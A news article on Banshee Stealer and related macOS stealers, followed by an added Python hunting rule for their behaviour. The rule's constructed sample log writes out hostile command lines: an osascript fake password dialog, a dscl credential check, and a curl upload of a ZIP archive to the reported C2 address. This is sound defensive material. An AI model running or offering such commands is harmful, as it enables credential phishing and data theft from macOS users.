Cybersecurity researchers have uncovered new stealer malware designed specifically to target Apple macOS systems.
Known as Banshee Stealer, it is sold in the cybercrime underground for a hefty $3,000 per month and supports both x86_64 and ARM64 (Apple silicon) architectures.
Elastic Security Labs stated in a report released on Thursday that “Banshee Stealer targets a wide range of browsers, cryptocurrency wallets, and approximately 100 browser extensions, making it a highly versatile and dangerous threat.”
The malware targets the Google Chrome, Mozilla Firefox, Brave, Microsoft Edge, Vivaldi, Yandex, Opera, and OperaGX browsers, along with the Exodus, Electrum, Coinomi, Guarda, Wasabi Wallet, Atomic, and Ledger cryptocurrency wallets.
It can also harvest system information, iCloud Keychain passwords, and Notes, and it ships with a slew of anti-analysis and anti-debugging checks that determine whether it is running in a virtual environment so it can avoid detection.
It also avoids infecting Russian-speaking systems by checking the user's preferred languages through the CFLocaleCopyPreferredLanguages API.
Like other macOS malware strains such as Cuckoo and MacStealer, Banshee Stealer uses osascript to display a fake password prompt that tricks users into entering their system password, which the malware then uses to gain elevated privileges.
Other noteworthy features include the ability to collect files with the .txt, .docx, .rtf, .doc, .wallet, .keys, and .key extensions from the Desktop and Documents folders. The harvested data is then packaged into a ZIP archive and sent to a remote server (for example, "45.142.122[.]92/send/").
Elastic said, “As macOS increasingly becomes a prime target for cybercriminals, Banshee Stealer underscores the rising observance of macOS-specific malware.”
Hunt.io and Kandji also disclosed another macOS stealer strain that uses SwiftUI and Apple's Open Directory APIs to capture passwords entered by the user into a fake prompt, displayed under the pretense of completing the installation process, and to verify that the captured password is correct.
“It begins by running a Swift-based dropper that displays a fake password prompt to deceive users,” Broadcom-owned Symantec said. “After capturing credentials, the malware verifies them using the OpenDirectory API and subsequently downloads and executes malicious scripts from a command-and-control server.”
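As an added illustration (this is not code from Elastic, Hunt.io, Kandji, Symantec, or either malware family), the following Python hunting rule scans process-execution events for the three behaviours described above: the osascript password dialog, the Open Directory credential check, and a ZIP archive uploaded to the reported endpoint. The JSON event format, the sample command lines, the process IDs and the helper names are assumptions made here; only the upload address comes from the report.

```python
"""Hunting rule for the macOS stealer behaviours described in the article.

Added example; the event format and all sample events are constructed.
"""
import json
import re
from dataclasses import dataclass

# Upload endpoint reported for Banshee Stealer (shown defanged as 45.142.122[.]92 in the report).
EXFIL_HOST = "45.142.122.92"

# Constructed process-execution events (assumption: newline-delimited JSON with
# "pid", "ppid", "process" and "args" keys, as an EDR export might provide).
SAMPLE_LOG = "\n".join(json.dumps(e) for e in [
    {"pid": 4012, "ppid": 4001, "process": "osascript",
     "args": "osascript -e 'display dialog \"macOS needs to update settings\" "
             "default answer \"\" with hidden answer with title \"System Preferences\"'"},
    {"pid": 4013, "ppid": 4001, "process": "dscl",
     "args": "dscl . -authonly alice hunter2"},
    {"pid": 4020, "ppid": 4001, "process": "curl",
     "args": "curl -s -X POST -F file=@/tmp/out.zip http://45.142.122.92/send/"},
    {"pid": 5100, "ppid": 1, "process": "osascript",
     "args": "osascript -e 'display notification \"Backup finished\"'"},   # benign
    {"pid": 5101, "ppid": 1, "process": "curl",
     "args": "curl -sS https://example.invalid/update.json"},               # benign
])


@dataclass(frozen=True)
class Finding:
    rule: str
    pid: int
    args: str


# Rule 1: AppleScript password-style prompt. "with hidden answer" masks the text
# field, which is what turns an ordinary dialog into a credential phish.
FAKE_PROMPT_RE = re.compile(r"display\s+dialog\b.*\bwith\s+hidden\s+answer\b", re.I | re.S)

# Rule 2: command-line credential verification against Open Directory. This only
# catches the dscl variant; an in-process OpenDirectory API call leaves no child
# process and has to be hunted in opendirectoryd/authorization telemetry instead.
AUTH_CHECK_RE = re.compile(r"\bdscl\b.*\s-authonly\b")

# Rule 3: a ZIP archive uploaded to the reported endpoint.
EXFIL_RE = re.compile(r"\b(curl|wget)\b.*\.zip\b.*" + re.escape(EXFIL_HOST), re.I | re.S)

RULES = [
    ("fake_password_prompt", FAKE_PROMPT_RE),
    ("od_credential_check", AUTH_CHECK_RE),
    ("zip_exfil_to_c2", EXFIL_RE),
]


def evaluate(event: dict) -> list[Finding]:
    """Return every rule that matches a single process event."""
    args = event.get("args", "")
    return [Finding(name, int(event.get("pid", -1)), args)
            for name, rx in RULES if rx.search(args)]


def hunt(log_text: str) -> list[Finding]:
    """Parse newline-delimited JSON events and collect findings in log order."""
    findings: list[Finding] = []
    for line in log_text.splitlines():
        if line.strip():
            findings.extend(evaluate(json.loads(line)))
    return findings


def correlate(log_text: str, min_rules: int = 2) -> dict[int, set[str]]:
    """Group findings by parent process. One parent whose children trip several
    distinct rules looks like the prompt -> verify -> upload chain of a stealer,
    which is a much stronger signal than any single rule on its own."""
    by_parent: dict[int, set[str]] = {}
    for line in log_text.splitlines():
        if not line.strip():
            continue
        event = json.loads(line)
        for f in evaluate(event):
            by_parent.setdefault(int(event.get("ppid", -1)), set()).add(f.rule)
    return {ppid: rules for ppid, rules in by_parent.items() if len(rules) >= min_rules}


if __name__ == "__main__":
    for f in hunt(SAMPLE_LOG):
        print(f"[{f.rule}] pid={f.pid}: {f.args}")
    print("suspicious parents:", correlate(SAMPLE_LOG))
```

On the constructed log the three malicious events each trip one rule and share parent 4001, so `correlate` reports that parent with all three rule names, while the benign notification and download trip nothing. The second rule is deliberately narrow: a stealer that calls the OpenDirectory API from inside its own process, as the Hunt.io/Kandji sample is described as doing, never spawns `dscl`, so a real deployment pairs this with authentication-side logging rather than relying on process telemetry alone.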
The development comes as fake sites masquerading as OpenAI's text-to-video artificial intelligence (AI) tool, Sora, are being used to propagate Braodo Stealer.
This development also follows the ongoing emergence of new Windows-based stealers like Flame Stealer.
Separately, Israeli users are being targeted with phishing emails carrying RAR archive attachments that impersonate the news outlets Calcalist and Mako in order to deliver Rhadamanthys Stealer.